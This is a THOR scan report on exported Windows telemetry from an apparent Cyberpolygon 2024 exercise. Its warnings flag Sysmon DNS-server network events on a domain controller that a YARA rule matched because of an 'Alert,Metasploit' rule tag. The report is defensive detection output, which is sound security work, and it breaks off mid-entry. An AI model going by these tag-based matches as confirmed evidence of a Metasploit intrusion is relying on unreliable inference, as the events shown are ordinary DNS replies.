
THOR Scan Report

Scan Information
Scanner Thor
Version 10.7.9
Run on System WIN-LRTT94FA08M
Argument list --path D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win --module filescan
Signature Database 2023/09/24-052825
Start Time Tue Sep 10 18:19:39 2024
End Time Tue Sep 10 18:29:12 2024
IP Addresses 10.100.5.12
Run as user WIN-LRTT94FA08M\Administrator
Admin rights yes
Platform Windows Server 2019 Standard
Log File Name WIN-LRTT94FA08M_thor_2024-09-10_1818.txt
False Positive Filters Applied 0
Scan ID S-9DFnio8ABo4
Modules
LogScan 27
Statistics
Alerts 0
Warnings 18
Notice 12
Info 121
Errors 0
Errors
Alerts
Warnings
Warning 1
Sep 10 18:18:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
Warning 2
Sep 10 18:18:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
Warning 3
Sep 10 18:21:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "xh4NtpEBNKI3r7qcPpS_", "_score": 1, "_source": {"@timestamp": "2024-09-03T04:03:16.879Z", "type": "wineventlog", "event": {"created": "2024-09-03T04:03:17.924Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 04:03:15.122\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44435\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17763.97[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 04:03:15.122", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44435"}, "record_id": 1097634, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 4
Sep 10 18:21:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "Yx4OtpEBNKI3r7qcbsZG", "_score": 1, "_source": {"@timestamp": "2024-09-03T04:04:32.853Z", "type": "wineventlog", "event": {"created": "2024-09-03T04:04:34.620Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 04:04:31.181\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.118.57\nDestinationHostname: -\nDestinationPort: 44482\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "version": "10.0", "build": "17763.973", "kernel": "10.0[...], "domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 04:04:31.181", "Protocol": "udp", "ProcessId": 3348, "SourcePort": "53", "RuleName": "Alert,Metasploit", "DestinationIp": "10.24.118.57", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44482"}, "record_id": 1097674, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 5
Sep 10 18:22:00 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "MTGJtpEBNKI3r7qcN7QY", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:18:48.485Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:18:50.079Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:18:46.592\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44486\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build": "17763.973", "kernel": "10.0.17[...]18", "domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:18:46.592", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44486", "Initiated": "false"}, "record_id": 1102865, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 6
Sep 10 18:22:00 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "6zCFtpEBNKI3r7qcA_6X", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:14:04.934Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:14:06.087Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:14:03.164\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44416\nDestinationPortName: -"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "version": "10.0", "build": "[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:14:03.164", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "RuleName": "Alert,Metasploit", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44416"}, "record_id": 1102815, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 7
Sep 10 18:22:05 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "mjCCtpEBNKI3r7qc1qT4", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:11:41.701Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:11:43.563Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:11:40.391\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44494\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"name": "Windows Server 2019 Datacenter", "platform": "windows", "build": "17763.973", "version": "10.0", "kernel": "10.0.17[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:11:40.391", "ProcessId": 3348, "Protocol": "udp", "SourcePort": "53", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44494", "Initiated": "false"}, "record_id": 1102805, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 8
Sep 10 18:22:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "xzOTtpEBNKI3r7qc2ndu", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:30:21.668Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:30:23.640Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:30:20.566\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44422\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "version": "10.0", "build": "[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:30:20.566", "Protocol": "udp", "SourcePort": "53", "ProcessId": 3348, "RuleName": "Alert,Metasploit", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "Initiated": "false", "DestinationPort": "44422"}, "record_id": 1103476, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 9
Sep 10 18:22:13 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "YzSYtpEBNKI3r7qcvIAf", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:35:39.350Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:35:40.707Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "action": "Network connection detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:35:37.740\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44402\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "71952f51-1623-43c9-a67a-cf4232d9a08f", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "build": "17763.973", "version": "1[...]domain": "NT AUTHORITY"}, "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:35:37.740", "SourcePort": "53", "ProcessId": 3348, "Protocol": "udp", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "DestinationIp": "10.24.7.2", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44402", "Initiated": "false"}, "record_id": 1103540, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "code": "3", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 10
Sep 10 18:22:16 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "9DGKtpEBNKI3r7qcsfZN", "_score": 1, "_source": {"@timestamp": "2024-09-03T06:20:19.575Z", "type": "wineventlog", "event": {"created": "2024-09-03T06:20:21.263Z", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "code": "3", "action": "Network connection detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit\nUtcTime: 2024-09-03 06:20:17.858\nProcessGuid: {71952f51-16c3-669e-4800-000000005500}\nProcessId: 3348\nImage: C:\\Windows\\System32\\dns.exe\nUser: NT AUTHORITY\\SYSTEM\nProtocol: udp\nInitiated: false\nSourceIsIpv6: false\nSourceIp: 10.24.3.5\nSourceHostname: dc01.MercuryLark.corp\nSourcePort: 53\nSourcePortName: domain\nDestinationIsIpv6: false\nDestinationIp: 10.24.7.2\nDestinationHostname: -\nDestinationPort: 44423\nDestinationPortName: -"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "dc01", "os": {"platform": "windows", "name": "Windows Server 2019 Datacenter", "build": "17763.973", "version": "10.0", "kernel": "10.0.17[...]e": "Microsoft-Windows-Sysmon", "event_data": {"SourceIp": "10.24.3.5", "SourceHostname": "dc01.MercuryLark.corp", "DestinationHostname": "-", "User": "NT AUTHORITY\\SYSTEM", "DestinationPortName": "-", "Image": "C:\\Windows\\System32\\dns.exe", "SourcePortName": "domain", "UtcTime": "2024-09-03 06:20:17.858", "Protocol": "udp", "ProcessId": 3348, "SourcePort": "53", "DestinationIp": "10.24.7.2", "ProcessGuid": "{71952f51-16c3-669e-4800-000000005500}", "RuleName": "Alert,Metasploit", "DestinationIsIpv6": "false", "SourceIsIpv6": "false", "DestinationPort": "44423", "Initiated": "false"}, "record_id": 1103116, "api": "wineventlog", "task": "Network connection detected (rule: NetworkConnect)", "channel": "Microsoft-Windows-Sysmon/Operational", "version": 5, "computer_name": "dc01.MercuryLark.corp", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 
"process": {"pid": 10676, "thread": {"id": 5284}}}}}
SCORE:
70
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Antivirus_Relevant_Signature_May22_1 / Detects relevant Antivirus events with signature matches that are highly relevant
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • detected (rule: NetworkConnect)", "original": "Network connection detected:\nRuleName: Alert,Metasploit
RULEDATE_1:
2022-05-11
TAGS_1:
LOG, SCRIPT
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Warning 11
Sep 10 18:22:31 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
